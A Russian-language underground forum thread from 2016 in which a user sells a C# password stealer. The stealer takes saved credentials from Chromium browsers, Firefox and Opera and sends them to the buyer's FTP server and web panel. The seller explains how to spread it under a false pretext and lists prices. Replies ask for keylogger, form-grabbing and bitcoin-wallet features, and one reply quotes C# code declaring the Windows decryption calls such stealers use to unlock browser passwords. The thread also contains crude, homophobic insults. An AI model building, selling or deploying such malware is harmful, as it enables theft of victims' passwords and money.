1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Продам собственный стиллер [3/35] [C#]

Тема в разделе "Покупка/Продажа | Обмен", создана пользователем VasiaPechkin, 2 дек 2016.

Метки:
?

Как вам оформление темы?

  1. Еба*ь тебя кирпичем, я тебе эти цвета в задницу засуну, дизайнер х*ев, бл*ть

    50,0%
  2. Я тоже гей, супер класс!

    50,0%
  1. TopicStarter Overlay
    VasiaPechkin

    VasiaPechkin Ананасик

    Регистрация:
    11 июн 2014
    Сообщения:
    239
    Симпатии:
    259
    [​IMG]
    Всем привет
    :dance3:
    С подачи Войти или зарегистрироваться, чтобы увидеть ссылку.'a появилась идея написать стиллер.
    Что и было успешно сделано в рамках моей студенческой практики))

    Принцип работы для сверхразумов:
    1. Делаем билд с нужным нам FTP (в поле FTP вводить только домен - google.com, например)
    2. Устанавлием веб панель из комплекта.
    3. Выкладываем билд под подходящим предлогом

    (Разгулятся негде, во имя беспалевности запилил только всплывающее сообщение на ваш вкус)
    4. Ждем-с.

    5. Профит.


    На данный момент поддерживает все Chromium браузеры (Хром, Яндекс, Амиго, Хуиго :D и тд), Mozilla Firefox и Opera Browser.



    Итак, что же у нас есть:

    Есть билдер:

    [​IMG]


    Есть веб панелька от Войти или зарегистрироваться, чтобы увидеть ссылку.'a:

    [​IMG]


    Есть, конечно же, сканвес в придачу) :


    [​IMG]

    Есть тесты, которые я проводил на Windows 10 x64 & Windows 8.1 x64
    За работоспособность на системах без предустановленного фреймворка 4.5.1, соответсвенно, не отвечаю. (Могу, наверное, добавить поддержку 4.0, см. ниже)

    И есть суммы, за которые все это можно получить ( а так же мою благодарность и дальнейшую разработку тулзов):




    Вариант1 - билд на заказ под ваш FTP (без билдера) - 1000 рублей.
    Вариант2 - Полноценный комплект билдер+панель+спасибo = 2000 рублей.
    Вариант3 - Комплект + доработка на ваш вкус (запуск файлов, поддержка ранних фреймворков и тд.)= договоримся :spiteful:
    Беру предоплату 50%, заебали кидалы меня уже.
    (В качестве "гаранта" предоставляю Лемминга, он любого за 1000$ найдет) :D
    В случае проблем, заснятых на видео - деньги верну.


    Связь со мной:
    Telegram:
    Войти или зарегистрироваться, чтобы увидеть ссылку.
    Jabber:
    [email protected]

    Я нищеброд без акков ни там, ни там:
    ЛС форума.
     
    • Like Like x 6
    Метки:
  2. ResH

    ResH

    Регистрация:
    26 июл 2012
    Сообщения:
    308
    Симпатии:
    248
    допиши еще кейлоггер + форм граббер , тогда твой билд будут покупать пачками )
     
    • Agree Agree x 1
  3. BloodWolf

    BloodWolf

    Регистрация:
    29 май 2012
    Сообщения:
    424
    Симпатии:
    359
    аха, знакомая сигнатура ))))
    Угадал ?
    Код:
    class Chromium
        {
            [DllImport("crypt32.dll", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)]
            private static extern bool CryptProtectData(ref DATA_BLOB pPlainText, string szDescription, ref DATA_BLOB pEntropy, IntPtr pReserved, ref CRYPTPROTECT_PROMPTSTRUCT pPrompt, int dwFlags, ref DATA_BLOB pCipherText);
            [DllImport("crypt32.dll", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)]
            private static extern
            bool CryptUnprotectData(ref DATA_BLOB pCipherText, ref string pszDescription, ref DATA_BLOB pEntropy, IntPtr pReserved, ref CRYPTPROTECT_PROMPTSTRUCT pPrompt, int dwFlags, ref DATA_BLOB pPlainText);
            [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
            internal struct DATA_BLOB
            {
                public int cbData;
                public IntPtr pbData;
            }
            [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
            internal struct CRYPTPROTECT_PROMPTSTRUCT
            {
                public int cbSize;
                public int dwPromptFlags;
                public IntPtr hwndApp;
                public string szPrompt;
            }
     
    • Like Like x 1
  4. TopicStarter Overlay
    VasiaPechkin

    VasiaPechkin Ананасик

    Регистрация:
    11 июн 2014
    Сообщения:
    239
    Симпатии:
    259
    ахахх) Я разные сурсы юзал, там все вперемешку
    Вроде в конечном итоге преимущественно опирался на этот из-за отсутствия библиотек)
     
  5. LittleBears

    LittleBears

    Регистрация:
    24 окт 2016
    Сообщения:
    97
    Симпатии:
    28
    Если допишем будешь первым покупателем?))Тебе скидочка.))
     
    • Like Like x 1
  6. ResH

    ResH

    Регистрация:
    26 июл 2012
    Сообщения:
    308
    Симпатии:
    248
    обязательно
     
    • Like Like x 1
  7. m177

    m177

    Регистрация:
    9 дек 2015
    Сообщения:
    3
    Симпатии:
    1
    а он выдёргивает только сохраненные? если нет то сможет тянуть инфо с httpS?
     
  8. TopicStarter Overlay
    VasiaPechkin

    VasiaPechkin Ананасик

    Регистрация:
    11 июн 2014
    Сообщения:
    239
    Симпатии:
    259
    пока-что только сохраненные
    в каком смысле "тянуть инфо"?
     
  9. audi

    audi

    Регистрация:
    10 янв 2017
    Сообщения:
    4
    Симпатии:
    0
    BTC data grabbit?
     
  10. TopicStarter Overlay
    VasiaPechkin

    VasiaPechkin Ананасик

    Регистрация:
    11 июн 2014
    Сообщения:
    239
    Симпатии:
    259
    подробней
    граббит он только пассы этих браузеров
    по желанию могу добавить функции
     
  11. audi

    audi

    Регистрация:
    10 янв 2017
    Сообщения:
    4
    Симпатии:
    0
    data bitcoin wallet
     
  12. TopicStarter Overlay
    VasiaPechkin

    VasiaPechkin Ананасик

    Регистрация:
    11 июн 2014
    Сообщения:
    239
    Симпатии:
    259
    if it's password is saved within browser - yes, sure
     

Поделиться этой страницей

Загрузка...